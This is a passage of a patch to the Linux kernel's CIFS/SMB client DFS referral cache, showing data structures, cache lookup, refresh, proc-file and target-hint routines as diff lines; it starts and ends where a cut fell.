+-	int path_consumed; /* RESP_GET_DFS_REFERRAL.PathConsumed */
+-	int numtgts;
+-	struct list_head tlist;
+-	struct cache_dfs_tgt *tgthint;
+-};
+-
+-/* List of referral server sessions per dfs mount */
+-struct mount_group {
+-	struct list_head list;
+-	uuid_t id;
+-	struct cifs_ses *sessions[CACHE_MAX_ENTRIES];
+-	int num_sessions;
+-	spinlock_t lock;
+-	struct list_head refresh_list;
+-	struct kref refcount;
+-};
+-
+-static struct kmem_cache *cache_slab __read_mostly;
+-static struct workqueue_struct *dfscache_wq __read_mostly;
+-
+-static int cache_ttl;
+-static DEFINE_SPINLOCK(cache_ttl_lock);
+-
+-static struct nls_table *cache_cp;
+-
+-/*
+- * Number of entries in the cache
+- */
+-static atomic_t cache_count;
+-
+-static struct hlist_head cache_htable[CACHE_HTABLE_SIZE];
+-static DECLARE_RWSEM(htable_rw_lock);
+-
+-static LIST_HEAD(mount_group_list);
+-static DEFINE_MUTEX(mount_group_list_lock);
+-
+-static void refresh_cache_worker(struct work_struct *work);
+-
+-static DECLARE_DELAYED_WORK(refresh_task, refresh_cache_worker);
+-
+-static void get_ipc_unc(const char *ref_path, char *ipc, size_t ipclen)
+-{
+-	const char *host;
+-	size_t len;
+-
+-	extract_unc_hostname(ref_path, &host, &len);
+-	scnprintf(ipc, ipclen, "\\\\%.*s\\IPC$", (int)len, host);
+-}
+-
+-static struct cifs_ses *find_ipc_from_server_path(struct cifs_ses **ses, const char *path)
+-{
+-	char unc[SERVER_NAME_LENGTH + sizeof("//x/IPC$")] = {0};
+-
+-	get_ipc_unc(path, unc, sizeof(unc));
+-	for (; *ses; ses++) {
+-		if (!strcasecmp(unc, (*ses)->tcon_ipc->tree_name))
+-			return *ses;
+-	}
+-	return ERR_PTR(-ENOENT);
+-}
+-
+-static void __mount_group_release(struct mount_group *mg)
+-{
+-	int i;
+-
+-	for (i = 0; i < mg->num_sessions; i++)
+-		cifs_put_smb_ses(mg->sessions[i]);
+-	kfree(mg);
+-}
+-
+-static void mount_group_release(struct kref *kref)
+-{
+-	struct mount_group *mg = container_of(kref, struct mount_group, refcount);
+-
+-	mutex_lock(&mount_group_list_lock);
+-	list_del(&mg->list);
+-	mutex_unlock(&mount_group_list_lock);
+-	__mount_group_release(mg);
+-}
+-
+-static struct mount_group *find_mount_group_locked(const uuid_t *id)
+-{
+-	struct mount_group *mg;
+-
+-	list_for_each_entry(mg, &mount_group_list, list) {
+-		if (uuid_equal(&mg->id, id))
+-			return mg;
+-	}
+-	return ERR_PTR(-ENOENT);
+-}
+-
+-static struct mount_group *__get_mount_group_locked(const uuid_t *id)
+-{
+-	struct mount_group *mg;
+-
+-	mg = find_mount_group_locked(id);
+-	if (!IS_ERR(mg))
+-		return mg;
+-
+-	mg = kmalloc(sizeof(*mg), GFP_KERNEL);
+-	if (!mg)
+-		return ERR_PTR(-ENOMEM);
+-	kref_init(&mg->refcount);
+-	uuid_copy(&mg->id, id);
+-	mg->num_sessions = 0;
+-	spin_lock_init(&mg->lock);
+-	list_add(&mg->list, &mount_group_list);
+-	return mg;
+-}
+-
+-static struct mount_group *get_mount_group(const uuid_t *id)
+-{
+-	struct mount_group *mg;
+-
+-	mutex_lock(&mount_group_list_lock);
+-	mg = __get_mount_group_locked(id);
+-	if (!IS_ERR(mg))
+-		kref_get(&mg->refcount);
+-	mutex_unlock(&mount_group_list_lock);
+-
+-	return mg;
+-}
+-
+-static void free_mount_group_list(void)
+-{
+-	struct mount_group *mg, *tmp_mg;
+-
+-	list_for_each_entry_safe(mg, tmp_mg, &mount_group_list, list) {
+-		list_del_init(&mg->list);
+-		__mount_group_release(mg);
+-	}
+-}
+-
+-/**
+- * dfs_cache_canonical_path - get a canonical DFS path
+- *
+- * @path: DFS path
+- * @cp: codepage
+- * @remap: mapping type
+- *
+- * Return canonical path if success, otherwise error.
+- */
+-char *dfs_cache_canonical_path(const char *path, const struct nls_table *cp, int remap)
+-{
+-	char *tmp;
+-	int plen = 0;
+-	char *npath;
+-
+-	if (!path || strlen(path) < 3 || (*path != '\\' && *path != '/'))
+-		return ERR_PTR(-EINVAL);
+-
+-	if (unlikely(strcmp(cp->charset, cache_cp->charset))) {
+-		tmp = (char *)cifs_strndup_to_utf16(path, strlen(path), &plen, cp, remap);
+-		if (!tmp) {
+-			cifs_dbg(VFS, "%s: failed to convert path to utf16\n", __func__);
+-			return ERR_PTR(-EINVAL);
+-		}
+-
+-		npath = cifs_strndup_from_utf16(tmp, plen, true, cache_cp);
+-		kfree(tmp);
+-
+-		if (!npath) {
+-			cifs_dbg(VFS, "%s: failed to convert path from utf16\n", __func__);
+-			return ERR_PTR(-EINVAL);
+-		}
+-	} else {
+-		npath = kstrdup(path, GFP_KERNEL);
+-		if (!npath)
+-			return ERR_PTR(-ENOMEM);
+-	}
+-	convert_delimiter(npath, '\\');
+-	return npath;
+-}
+-
+-static inline bool cache_entry_expired(const struct cache_entry *ce)
+-{
+-	struct timespec64 ts;
+-
+-	ktime_get_coarse_real_ts64(&ts);
+-	return timespec64_compare(&ts, &ce->etime) >= 0;
+-}
+-
+-static inline void free_tgts(struct cache_entry *ce)
+-{
+-	struct cache_dfs_tgt *t, *n;
+-
+-	list_for_each_entry_safe(t, n, &ce->tlist, list) {
+-		list_del(&t->list);
+-		kfree(t->name);
+-		kfree(t);
+-	}
+-}
+-
+-static inline void flush_cache_ent(struct cache_entry *ce)
+-{
+-	hlist_del_init(&ce->hlist);
+-	kfree(ce->path);
+-	free_tgts(ce);
+-	atomic_dec(&cache_count);
+-	kmem_cache_free(cache_slab, ce);
+-}
+-
+-static void flush_cache_ents(void)
+-{
+-	int i;
+-
+-	for (i = 0; i < CACHE_HTABLE_SIZE; i++) {
+-		struct hlist_head *l = &cache_htable[i];
+-		struct hlist_node *n;
+-		struct cache_entry *ce;
+-
+-		hlist_for_each_entry_safe(ce, n, l, hlist) {
+-			if (!hlist_unhashed(&ce->hlist))
+-				flush_cache_ent(ce);
+-		}
+-	}
+-}
+-
+-/*
+- * dfs cache /proc file
+- */
+-static int dfscache_proc_show(struct seq_file *m, void *v)
+-{
+-	int i;
+-	struct cache_entry *ce;
+-	struct cache_dfs_tgt *t;
+-
+-	seq_puts(m, "DFS cache\n---------\n");
+-
+-	down_read(&htable_rw_lock);
+-	for (i = 0; i < CACHE_HTABLE_SIZE; i++) {
+-		struct hlist_head *l = &cache_htable[i];
+-
+-		hlist_for_each_entry(ce, l, hlist) {
+-			if (hlist_unhashed(&ce->hlist))
+-				continue;
+-
+-			seq_printf(m,
+-				   "cache entry: path=%s,type=%s,ttl=%d,etime=%ld,hdr_flags=0x%x,ref_flags=0x%x,interlink=%s,path_consumed=%d,expired=%s\n",
+-				   ce->path, ce->srvtype == DFS_TYPE_ROOT ? "root" : "link",
+-				   ce->ttl, ce->etime.tv_nsec, ce->hdr_flags, ce->ref_flags,
+-				   IS_DFS_INTERLINK(ce->hdr_flags) ? "yes" : "no",
+-				   ce->path_consumed, cache_entry_expired(ce) ? "yes" : "no");
+-
+-			list_for_each_entry(t, &ce->tlist, list) {
+-				seq_printf(m, "  %s%s\n",
+-					   t->name,
+-					   ce->tgthint == t ? " (target hint)" : "");
+-			}
+-		}
+-	}
+-	up_read(&htable_rw_lock);
+-
+-	return 0;
+-}
+-
+-static ssize_t dfscache_proc_write(struct file *file, const char __user *buffer,
+-				   size_t count, loff_t *ppos)
+-{
+-	char c;
+-	int rc;
+-
+-	rc = get_user(c, buffer);
+-	if (rc)
+-		return rc;
+-
+-	if (c != '0')
+-		return -EINVAL;
+-
+-	cifs_dbg(FYI, "clearing dfs cache\n");
+-
+-	down_write(&htable_rw_lock);
+-	flush_cache_ents();
+-	up_write(&htable_rw_lock);
+-
+-	return count;
+-}
+-
+-static int dfscache_proc_open(struct inode *inode, struct file *file)
+-{
+-	return single_open(file, dfscache_proc_show, NULL);
+-}
+-
+-const struct proc_ops dfscache_proc_ops = {
+-	.proc_open	= dfscache_proc_open,
+-	.proc_read	= seq_read,
+-	.proc_lseek	= seq_lseek,
+-	.proc_release	= single_release,
+-	.proc_write	= dfscache_proc_write,
+-};
+-
+-#ifdef CONFIG_CIFS_DEBUG2
+-static inline void dump_tgts(const struct cache_entry *ce)
+-{
+-	struct cache_dfs_tgt *t;
+-
+-	cifs_dbg(FYI, "target list:\n");
+-	list_for_each_entry(t, &ce->tlist, list) {
+-		cifs_dbg(FYI, "  %s%s\n", t->name,
+-			 ce->tgthint == t ? " (target hint)" : "");
+-	}
+-}
+-
+-static inline void dump_ce(const struct cache_entry *ce)
+-{
+-	cifs_dbg(FYI, "cache entry: path=%s,type=%s,ttl=%d,etime=%ld,hdr_flags=0x%x,ref_flags=0x%x,interlink=%s,path_consumed=%d,expired=%s\n",
+-		 ce->path,
+-		 ce->srvtype == DFS_TYPE_ROOT ? "root" : "link", ce->ttl,
+-		 ce->etime.tv_nsec,
+-		 ce->hdr_flags, ce->ref_flags,
+-		 IS_DFS_INTERLINK(ce->hdr_flags) ? "yes" : "no",
+-		 ce->path_consumed,
+-		 cache_entry_expired(ce) ? "yes" : "no");
+-	dump_tgts(ce);
+-}
+-
+-static inline void dump_refs(const struct dfs_info3_param *refs, int numrefs)
+-{
+-	int i;
+-
+-	cifs_dbg(FYI, "DFS referrals returned by the server:\n");
+-	for (i = 0; i < numrefs; i++) {
+-		const struct dfs_info3_param *ref = &refs[i];
+-
+-		cifs_dbg(FYI,
+-			 "\n"
+-			 "flags:         0x%x\n"
+-			 "path_consumed: %d\n"
+-			 "server_type:   0x%x\n"
+-			 "ref_flag:      0x%x\n"
+-			 "path_name:     %s\n"
+-			 "node_name:     %s\n"
+-			 "ttl:           %d (%dm)\n",
+-			 ref->flags, ref->path_consumed, ref->server_type,
+-			 ref->ref_flag, ref->path_name, ref->node_name,
+-			 ref->ttl, ref->ttl / 60);
+-	}
+-}
+-#else
+-#define dump_tgts(e)
+-#define dump_ce(e)
+-#define dump_refs(r, n)
+-#endif
+-
+-/**
+- * dfs_cache_init - Initialize DFS referral cache.
+- *
+- * Return zero if initialized successfully, otherwise non-zero.
+- */
+-int dfs_cache_init(void)
+-{
+-	int rc;
+-	int i;
+-
+-	dfscache_wq = alloc_workqueue("cifs-dfscache", WQ_FREEZABLE | WQ_UNBOUND, 1);
+-	if (!dfscache_wq)
+-		return -ENOMEM;
+-
+-	cache_slab = kmem_cache_create("cifs_dfs_cache",
+-				       sizeof(struct cache_entry), 0,
+-				       SLAB_HWCACHE_ALIGN, NULL);
+-	if (!cache_slab) {
+-		rc = -ENOMEM;
+-		goto out_destroy_wq;
+-	}
+-
+-	for (i = 0; i < CACHE_HTABLE_SIZE; i++)
+-		INIT_HLIST_HEAD(&cache_htable[i]);
+-
+-	atomic_set(&cache_count, 0);
+-	cache_cp = load_nls("utf8");
+-	if (!cache_cp)
+-		cache_cp = load_nls_default();
+-
+-	cifs_dbg(FYI, "%s: initialized DFS referral cache\n", __func__);
+-	return 0;
+-
+-out_destroy_wq:
+-	destroy_workqueue(dfscache_wq);
+-	return rc;
+-}
+-
+-static int cache_entry_hash(const void *data, int size, unsigned int *hash)
+-{
+-	int i, clen;
+-	const unsigned char *s = data;
+-	wchar_t c;
+-	unsigned int h = 0;
+-
+-	for (i = 0; i < size; i += clen) {
+-		clen = cache_cp->char2uni(&s[i], size - i, &c);
+-		if (unlikely(clen < 0)) {
+-			cifs_dbg(VFS, "%s: can't convert char\n", __func__);
+-			return clen;
+-		}
+-		c = cifs_toupper(c);
+-		h = jhash(&c, sizeof(c), h);
+-	}
+-	*hash = h % CACHE_HTABLE_SIZE;
+-	return 0;
+-}
+-
+-/* Return target hint of a DFS cache entry */
+-static inline char *get_tgt_name(const struct cache_entry *ce)
+-{
+-	struct cache_dfs_tgt *t = ce->tgthint;
+-
+-	return t ? t->name : ERR_PTR(-ENOENT);
+-}
+-
+-/* Return expire time out of a new entry's TTL */
+-static inline struct timespec64 get_expire_time(int ttl)
+-{
+-	struct timespec64 ts = {
+-		.tv_sec = ttl,
+-		.tv_nsec = 0,
+-	};
+-	struct timespec64 now;
+-
+-	ktime_get_coarse_real_ts64(&now);
+-	return timespec64_add(now, ts);
+-}
+-
+-/* Allocate a new DFS target */
+-static struct cache_dfs_tgt *alloc_target(const char *name, int path_consumed)
+-{
+-	struct cache_dfs_tgt *t;
+-
+-	t = kmalloc(sizeof(*t), GFP_ATOMIC);
+-	if (!t)
+-		return ERR_PTR(-ENOMEM);
+-	t->name = kstrdup(name, GFP_ATOMIC);
+-	if (!t->name) {
+-		kfree(t);
+-		return ERR_PTR(-ENOMEM);
+-	}
+-	t->path_consumed = path_consumed;
+-	INIT_LIST_HEAD(&t->list);
+-	return t;
+-}
+-
+-/*
+- * Copy DFS referral information to a cache entry and conditionally update
+- * target hint.
+- */
+-static int copy_ref_data(const struct dfs_info3_param *refs, int numrefs,
+-			 struct cache_entry *ce, const char *tgthint)
+-{
+-	int i;
+-
+-	ce->ttl = max_t(int, refs[0].ttl, CACHE_MIN_TTL);
+-	ce->etime = get_expire_time(ce->ttl);
+-	ce->srvtype = refs[0].server_type;
+-	ce->hdr_flags = refs[0].flags;
+-	ce->ref_flags = refs[0].ref_flag;
+-	ce->path_consumed = refs[0].path_consumed;
+-
+-	for (i = 0; i < numrefs; i++) {
+-		struct cache_dfs_tgt *t;
+-
+-		t = alloc_target(refs[i].node_name, refs[i].path_consumed);
+-		if (IS_ERR(t)) {
+-			free_tgts(ce);
+-			return PTR_ERR(t);
+-		}
+-		if (tgthint && !strcasecmp(t->name, tgthint)) {
+-			list_add(&t->list, &ce->tlist);
+-			tgthint = NULL;
+-		} else {
+-			list_add_tail(&t->list, &ce->tlist);
+-		}
+-		ce->numtgts++;
+-	}
+-
+-	ce->tgthint = list_first_entry_or_null(&ce->tlist,
+-					       struct cache_dfs_tgt, list);
+-
+-	return 0;
+-}
+-
+-/* Allocate a new cache entry */
+-static struct cache_entry *alloc_cache_entry(struct dfs_info3_param *refs, int numrefs)
+-{
+-	struct cache_entry *ce;
+-	int rc;
+-
+-	ce = kmem_cache_zalloc(cache_slab, GFP_KERNEL);
+-	if (!ce)
+-		return ERR_PTR(-ENOMEM);
+-
+-	ce->path = refs[0].path_name;
+-	refs[0].path_name = NULL;
+-
+-	INIT_HLIST_NODE(&ce->hlist);
+-	INIT_LIST_HEAD(&ce->tlist);
+-
+-	rc = copy_ref_data(refs, numrefs, ce, NULL);
+-	if (rc) {
+-		kfree(ce->path);
+-		kmem_cache_free(cache_slab, ce);
+-		ce = ERR_PTR(rc);
+-	}
+-	return ce;
+-}
+-
+-static void remove_oldest_entry_locked(void)
+-{
+-	int i;
+-	struct cache_entry *ce;
+-	struct cache_entry *to_del = NULL;
+-
+-	WARN_ON(!rwsem_is_locked(&htable_rw_lock));
+-
+-	for (i = 0; i < CACHE_HTABLE_SIZE; i++) {
+-		struct hlist_head *l = &cache_htable[i];
+-
+-		hlist_for_each_entry(ce, l, hlist) {
+-			if (hlist_unhashed(&ce->hlist))
+-				continue;
+-			if (!to_del || timespec64_compare(&ce->etime,
+-							  &to_del->etime) < 0)
+-				to_del = ce;
+-		}
+-	}
+-
+-	if (!to_del) {
+-		cifs_dbg(FYI, "%s: no entry to remove\n", __func__);
+-		return;
+-	}
+-
+-	cifs_dbg(FYI, "%s: removing entry\n", __func__);
+-	dump_ce(to_del);
+-	flush_cache_ent(to_del);
+-}
+-
+-/* Add a new DFS cache entry */
+-static int add_cache_entry_locked(struct dfs_info3_param *refs, int numrefs)
+-{
+-	int rc;
+-	struct cache_entry *ce;
+-	unsigned int hash;
+-
+-	WARN_ON(!rwsem_is_locked(&htable_rw_lock));
+-
+-	if (atomic_read(&cache_count) >= CACHE_MAX_ENTRIES) {
+-		cifs_dbg(FYI, "%s: reached max cache size (%d)\n", __func__, CACHE_MAX_ENTRIES);
+-		remove_oldest_entry_locked();
+-	}
+-
+-	rc = cache_entry_hash(refs[0].path_name, strlen(refs[0].path_name), &hash);
+-	if (rc)
+-		return rc;
+-
+-	ce = alloc_cache_entry(refs, numrefs);
+-	if (IS_ERR(ce))
+-		return PTR_ERR(ce);
+-
+-	spin_lock(&cache_ttl_lock);
+-	if (!cache_ttl) {
+-		cache_ttl = ce->ttl;
+-		queue_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
+-	} else {
+-		cache_ttl = min_t(int, cache_ttl, ce->ttl);
+-		mod_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
+-	}
+-	spin_unlock(&cache_ttl_lock);
+-
+-	hlist_add_head(&ce->hlist, &cache_htable[hash]);
+-	dump_ce(ce);
+-
+-	atomic_inc(&cache_count);
+-
+-	return 0;
+-}
+-
+-/* Check if two DFS paths are equal.  @s1 and @s2 are expected to be in @cache_cp's charset */
+-static bool dfs_path_equal(const char *s1, int len1, const char *s2, int len2)
+-{
+-	int i, l1, l2;
+-	wchar_t c1, c2;
+-
+-	if (len1 != len2)
+-		return false;
+-
+-	for (i = 0; i < len1; i += l1) {
+-		l1 = cache_cp->char2uni(&s1[i], len1 - i, &c1);
+-		l2 = cache_cp->char2uni(&s2[i], len2 - i, &c2);
+-		if (unlikely(l1 < 0 && l2 < 0)) {
+-			if (s1[i] != s2[i])
+-				return false;
+-			l1 = 1;
+-			continue;
+-		}
+-		if (l1 != l2)
+-			return false;
+-		if (cifs_toupper(c1) != cifs_toupper(c2))
+-			return false;
+-	}
+-	return true;
+-}
+-
+-static struct cache_entry *__lookup_cache_entry(const char *path, unsigned int hash, int len)
+-{
+-	struct cache_entry *ce;
+-
+-	hlist_for_each_entry(ce, &cache_htable[hash], hlist) {
+-		if (dfs_path_equal(ce->path, strlen(ce->path), path, len)) {
+-			dump_ce(ce);
+-			return ce;
+-		}
+-	}
+-	return ERR_PTR(-ENOENT);
+-}
+-
+-/*
+- * Find a DFS cache entry in hash table and optionally check prefix path against normalized @path.
+- *
+- * Use whole path components in the match.  Must be called with htable_rw_lock held.
+- *
+- * Return ERR_PTR(-ENOENT) if the entry is not found.
+- */
+-static struct cache_entry *lookup_cache_entry(const char *path)
+-{
+-	struct cache_entry *ce;
+-	int cnt = 0;
+-	const char *s = path, *e;
+-	char sep = *s;
+-	unsigned int hash;
+-	int rc;
+-
+-	while ((s = strchr(s, sep)) && ++cnt < 3)
+-		s++;
+-
+-	if (cnt < 3) {
+-		rc = cache_entry_hash(path, strlen(path), &hash);
+-		if (rc)
+-			return ERR_PTR(rc);
+-		return __lookup_cache_entry(path, hash, strlen(path));
+-	}
+-	/*
+-	 * Handle paths that have more than two path components and are a complete prefix of the DFS
+-	 * referral request path (@path).
+-	 *
+-	 * See MS-DFSC 3.2.5.5 "Receiving a Root Referral Request or Link Referral Request".
+-	 */
+-	e = path + strlen(path) - 1;
+-	while (e > s) {
+-		int len;
+-
+-		/* skip separators */
+-		while (e > s && *e == sep)
+-			e--;
+-		if (e == s)
+-			break;
+-
+-		len = e + 1 - path;
+-		rc = cache_entry_hash(path, len, &hash);
+-		if (rc)
+-			return ERR_PTR(rc);
+-		ce = __lookup_cache_entry(path, hash, len);
+-		if (!IS_ERR(ce))
+-			return ce;
+-
+-		/* backward until separator */
+-		while (e > s && *e != sep)
+-			e--;
+-	}
+-	return ERR_PTR(-ENOENT);
+-}
+-
+-/**
+- * dfs_cache_destroy - destroy DFS referral cache
+- */
+-void dfs_cache_destroy(void)
+-{
+-	cancel_delayed_work_sync(&refresh_task);
+-	unload_nls(cache_cp);
+-	free_mount_group_list();
+-	flush_cache_ents();
+-	kmem_cache_destroy(cache_slab);
+-	destroy_workqueue(dfscache_wq);
+-
+-	cifs_dbg(FYI, "%s: destroyed DFS referral cache\n", __func__);
+-}
+-
+-/* Update a cache entry with the new referral in @refs */
+-static int update_cache_entry_locked(struct cache_entry *ce, const struct dfs_info3_param *refs,
+-				     int numrefs)
+-{
+-	int rc;
+-	char *s, *th = NULL;
+-
+-	WARN_ON(!rwsem_is_locked(&htable_rw_lock));
+-
+-	if (ce->tgthint) {
+-		s = ce->tgthint->name;
+-		th = kstrdup(s, GFP_ATOMIC);
+-		if (!th)
+-			return -ENOMEM;
+-	}
+-
+-	free_tgts(ce);
+-	ce->numtgts = 0;
+-
+-	rc = copy_ref_data(refs, numrefs, ce, th);
+-
+-	kfree(th);
+-
+-	return rc;
+-}
+-
+-static int get_dfs_referral(const unsigned int xid, struct cifs_ses *ses, const char *path,
+-			    struct dfs_info3_param **refs, int *numrefs)
+-{
+-	int rc;
+-	int i;
+-
+-	cifs_dbg(FYI, "%s: get an DFS referral for %s\n", __func__, path);
+-
+-	*refs = NULL;
+-	*numrefs = 0;
+-
+-	if (!ses || !ses->server || !ses->server->ops->get_dfs_refer)
+-		return -EOPNOTSUPP;
+-	if (unlikely(!cache_cp))
+-		return -EINVAL;
+-
+-	rc =  ses->server->ops->get_dfs_refer(xid, ses, path, refs, numrefs, cache_cp,
+-					      NO_MAP_UNI_RSVD);
+-	if (!rc) {
+-		struct dfs_info3_param *ref = *refs;
+-
+-		for (i = 0; i < *numrefs; i++)
+-			convert_delimiter(ref[i].path_name, '\\');
+-	}
+-	return rc;
+-}
+-
+-/*
+- * Find, create or update a DFS cache entry.
+- *
+- * If the entry wasn't found, it will create a new one. Or if it was found but
+- * expired, then it will update the entry accordingly.
+- *
+- * For interlinks, cifs_mount() and expand_dfs_referral() are supposed to
+- * handle them properly.
+- */
+-static int cache_refresh_path(const unsigned int xid, struct cifs_ses *ses, const char *path)
+-{
+-	struct dfs_info3_param *refs = NULL;
+-	struct cache_entry *ce;
+-	int numrefs = 0;
+-	int rc;
+-
+-	cifs_dbg(FYI, "%s: search path: %s\n", __func__, path);
+-
+-	down_read(&htable_rw_lock);
+-
+-	ce = lookup_cache_entry(path);
+-	if (!IS_ERR(ce) && !cache_entry_expired(ce)) {
+-		up_read(&htable_rw_lock);
+-		return 0;
+-	}
+-	/*
+-	 * Unlock shared access as we don't want to hold any locks while getting
+-	 * a new referral.  The @ses used for performing the I/O could be
+-	 * reconnecting and it acquires @htable_rw_lock to look up the dfs cache
+-	 * in order to failover -- if necessary.
+-	 */
+-	up_read(&htable_rw_lock);
+-
+-	/*
+-	 * Either the entry was not found, or it is expired.
+-	 * Request a new DFS referral in order to create or update a cache entry.
+-	 */
+-	rc = get_dfs_referral(xid, ses, path, &refs, &numrefs);
+-	if (rc)
+-		goto out;
+-
+-	dump_refs(refs, numrefs);
+-
+-	down_write(&htable_rw_lock);
+-	/* Re-check as another task might have it added or refreshed already */
+-	ce = lookup_cache_entry(path);
+-	if (!IS_ERR(ce)) {
+-		if (cache_entry_expired(ce))
+-			rc = update_cache_entry_locked(ce, refs, numrefs);
+-	} else {
+-		rc = add_cache_entry_locked(refs, numrefs);
+-	}
+-
+-	up_write(&htable_rw_lock);
+-out:
+-	free_dfs_info_array(refs, numrefs);
+-	return rc;
+-}
+-
+-/*
+- * Set up a DFS referral from a given cache entry.
+- *
+- * Must be called with htable_rw_lock held.
+- */
+-static int setup_referral(const char *path, struct cache_entry *ce,
+-			  struct dfs_info3_param *ref, const char *target)
+-{
+-	int rc;
+-
+-	cifs_dbg(FYI, "%s: set up new ref\n", __func__);
+-
+-	memset(ref, 0, sizeof(*ref));
+-
+-	ref->path_name = kstrdup(path, GFP_ATOMIC);
+-	if (!ref->path_name)
+-		return -ENOMEM;
+-
+-	ref->node_name = kstrdup(target, GFP_ATOMIC);
+-	if (!ref->node_name) {
+-		rc = -ENOMEM;
+-		goto err_free_path;
+-	}
+-
+-	ref->path_consumed = ce->path_consumed;
+-	ref->ttl = ce->ttl;
+-	ref->server_type = ce->srvtype;
+-	ref->ref_flag = ce->ref_flags;
+-	ref->flags = ce->hdr_flags;
+-
+-	return 0;
+-
+-err_free_path:
+-	kfree(ref->path_name);
+-	ref->path_name = NULL;
+-	return rc;
+-}
+-
+-/* Return target list of a DFS cache entry */
+-static int get_targets(struct cache_entry *ce, struct dfs_cache_tgt_list *tl)
+-{
+-	int rc;
+-	struct list_head *head = &tl->tl_list;
+-	struct cache_dfs_tgt *t;
+-	struct dfs_cache_tgt_iterator *it, *nit;
+-
+-	memset(tl, 0, sizeof(*tl));
+-	INIT_LIST_HEAD(head);
+-
+-	list_for_each_entry(t, &ce->tlist, list) {
+-		it = kzalloc(sizeof(*it), GFP_ATOMIC);
+-		if (!it) {
+-			rc = -ENOMEM;
+-			goto err_free_it;
+-		}
+-
+-		it->it_name = kstrdup(t->name, GFP_ATOMIC);
+-		if (!it->it_name) {
+-			kfree(it);
+-			rc = -ENOMEM;
+-			goto err_free_it;
+-		}
+-		it->it_path_consumed = t->path_consumed;
+-
+-		if (ce->tgthint == t)
+-			list_add(&it->it_list, head);
+-		else
+-			list_add_tail(&it->it_list, head);
+-	}
+-
+-	tl->tl_numtgts = ce->numtgts;
+-
+-	return 0;
+-
+-err_free_it:
+-	list_for_each_entry_safe(it, nit, head, it_list) {
+-		list_del(&it->it_list);
+-		kfree(it->it_name);
+-		kfree(it);
+-	}
+-	return rc;
+-}
+-
+-/**
+- * dfs_cache_find - find a DFS cache entry
+- *
+- * If it doesn't find the cache entry, then it will get a DFS referral
+- * for @path and create a new entry.
+- *
+- * In case the cache entry exists but expired, it will get a DFS referral
+- * for @path and then update the respective cache entry.
+- *
+- * These parameters are passed down to the get_dfs_refer() call if it
+- * needs to be issued:
+- * @xid: syscall xid
+- * @ses: smb session to issue the request on
+- * @cp: codepage
+- * @remap: path character remapping type
+- * @path: path to lookup in DFS referral cache.
+- *
+- * @ref: when non-NULL, store single DFS referral result in it.
+- * @tgt_list: when non-NULL, store complete DFS target list in it.
+- *
+- * Return zero if the target was found, otherwise non-zero.
+- */
+-int dfs_cache_find(const unsigned int xid, struct cifs_ses *ses, const struct nls_table *cp,
+-		   int remap, const char *path, struct dfs_info3_param *ref,
+-		   struct dfs_cache_tgt_list *tgt_list)
+-{
+-	int rc;
+-	const char *npath;
+-	struct cache_entry *ce;
+-
+-	npath = dfs_cache_canonical_path(path, cp, remap);
+-	if (IS_ERR(npath))
+-		return PTR_ERR(npath);
+-
+-	rc = cache_refresh_path(xid, ses, npath);
+-	if (rc)
+-		goto out_free_path;
+-
+-	down_read(&htable_rw_lock);
+-
+-	ce = lookup_cache_entry(npath);
+-	if (IS_ERR(ce)) {
+-		up_read(&htable_rw_lock);
+-		rc = PTR_ERR(ce);
+-		goto out_free_path;
+-	}
+-
+-	if (ref)
+-		rc = setup_referral(path, ce, ref, get_tgt_name(ce));
+-	else
+-		rc = 0;
+-	if (!rc && tgt_list)
+-		rc = get_targets(ce, tgt_list);
+-
+-	up_read(&htable_rw_lock);
+-
+-out_free_path:
+-	kfree(npath);
+-	return rc;
+-}
+-
+-/**
+- * dfs_cache_noreq_find - find a DFS cache entry without sending any requests to
+- * the currently connected server.
+- *
+- * NOTE: This function will neither update a cache entry in case it was
+- * expired, nor create a new cache entry if @path hasn't been found. It heavily
+- * relies on an existing cache entry.
+- *
+- * @path: canonical DFS path to lookup in the DFS referral cache.
+- * @ref: when non-NULL, store single DFS referral result in it.
+- * @tgt_list: when non-NULL, store complete DFS target list in it.
+- *
+- * Return 0 if successful.
+- * Return -ENOENT if the entry was not found.
+- * Return non-zero for other errors.
+- */
+-int dfs_cache_noreq_find(const char *path, struct dfs_info3_param *ref,
+-			 struct dfs_cache_tgt_list *tgt_list)
+-{
+-	int rc;
+-	struct cache_entry *ce;
+-
+-	cifs_dbg(FYI, "%s: path: %s\n", __func__, path);
+-
+-	down_read(&htable_rw_lock);
+-
+-	ce = lookup_cache_entry(path);
+-	if (IS_ERR(ce)) {
+-		rc = PTR_ERR(ce);
+-		goto out_unlock;
+-	}
+-
+-	if (ref)
+-		rc = setup_referral(path, ce, ref, get_tgt_name(ce));
+-	else
+-		rc = 0;
+-	if (!rc && tgt_list)
+-		rc = get_targets(ce, tgt_list);
+-
+-out_unlock:
+-	up_read(&htable_rw_lock);
+-	return rc;
+-}
+-
+-/**
+- * dfs_cache_update_tgthint - update target hint of a DFS cache entry
+- *
+- * If it doesn't find the cache entry, then it will get a DFS referral for @path
+- * and create a new entry.
+- *
+- * In case the cache entry exists but expired, it will get a DFS referral
+- * for @path and then update the respective cache entry.
+- *
+- * @xid: syscall id
+- * @ses: smb session
+- * @cp: codepage
+- * @remap: type of character remapping for paths
+- * @path: path to lookup in DFS referral cache
+- * @it: DFS target iterator
+- *
+- * Return zero if the target hint was updated successfully, otherwise non-zero.
+- */
+-int dfs_cache_update_tgthint(const unsigned int xid, struct cifs_ses *ses,
+-			     const struct nls_table *cp, int remap, const char *path,
+-			     const struct dfs_cache_tgt_iterator *it)
+-{
+-	struct cache_dfs_tgt *t;
+-	struct cache_entry *ce;
+-	const char *npath;
+-	int rc = 0;
+-
+-	npath = dfs_cache_canonical_path(path, cp, remap);
+-	if (IS_ERR(npath))
+-		return PTR_ERR(npath);
+-
+-	cifs_dbg(FYI, "%s: update target hint - path: %s\n", __func__, npath);
+-
+-	rc = cache_refresh_path(xid, ses, npath);
+-	if (rc)
+-		goto out_free_path;
+-
+-	down_write(&htable_rw_lock);
+-
+-	ce = lookup_cache_entry(npath);
+-	if (IS_ERR(ce)) {
+-		rc = PTR_ERR(ce);
+-		goto out_unlock;
+-	}
+-
+-	t = ce->tgthint;
+-
+-	if (likely(!strcasecmp(it->it_name, t->name)))
+-		goto out_unlock;
+-
+-	list_for_each_entry(t, &ce->tlist, list) {
+-		if (!strcasecmp(t->name, it->it_name)) {
+-			ce->tgthint = t;
+-			cifs_dbg(FYI, "%s: new target hint: %s\n", __func__,
+-				 it->it_name);
+-			break;
+-		}
+-	}
+-
+-out_unlock:
+-	up_write(&htable_rw_lock);
+-out_free_path:
+-	kfree(npath);
